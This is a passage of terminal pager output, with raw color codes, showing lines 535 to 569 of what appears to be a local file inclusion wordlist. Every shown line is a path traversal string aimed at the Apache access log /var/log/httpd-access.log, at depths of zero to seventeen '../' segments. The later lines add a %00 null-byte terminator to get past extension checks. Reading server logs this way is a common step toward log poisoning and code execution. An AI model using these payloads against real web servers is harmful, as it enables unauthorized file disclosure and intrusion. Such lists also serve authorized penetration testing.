[38;5;238m 535[0m   [38;5;238m│[0m [38;2;248;248;242m../../var/log/httpd-access.log[0m
[38;5;238m 536[0m   [38;5;238m│[0m [38;2;248;248;242m../../../var/log/httpd-access.log[0m
[38;5;238m 537[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../var/log/httpd-access.log[0m
[38;5;238m 538[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../var/log/httpd-access.log[0m
[38;5;238m 539[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../var/log/httpd-access.log[0m
[38;5;238m 540[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 541[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 542[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 543[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 544[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 545[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 546[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 547[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 548[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 549[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 550[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../var/log/httpd-access.log[0m
[38;5;238m 551[0m   [38;5;238m│[0m [38;2;248;248;242m/var/log/httpd-access.log%00[0m
[38;5;238m 552[0m   [38;5;238m│[0m [38;2;248;248;242m../var/log/httpd-access.log%00[0m
[38;5;238m 553[0m   [38;5;238m│[0m [38;2;248;248;242m../../var/log/httpd-access.log%00[0m
[38;5;238m 554[0m   [38;5;238m│[0m [38;2;248;248;242m../../../var/log/httpd-access.log%00[0m
[38;5;238m 555[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../var/log/httpd-access.log%00[0m
[38;5;238m 556[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 557[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 558[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 559[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 560[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 561[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 562[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 563[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 564[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 565[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 566[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 567[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 568[0m   [38;5;238m│[0m [38;2;248;248;242m../../../../../../../../../../../../../../../../../var/log/httpd-access.log%00[0m
[38;5;238m 569[0m   [38;5;238m│[0m 
[38;5;238m───────┴──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[0m
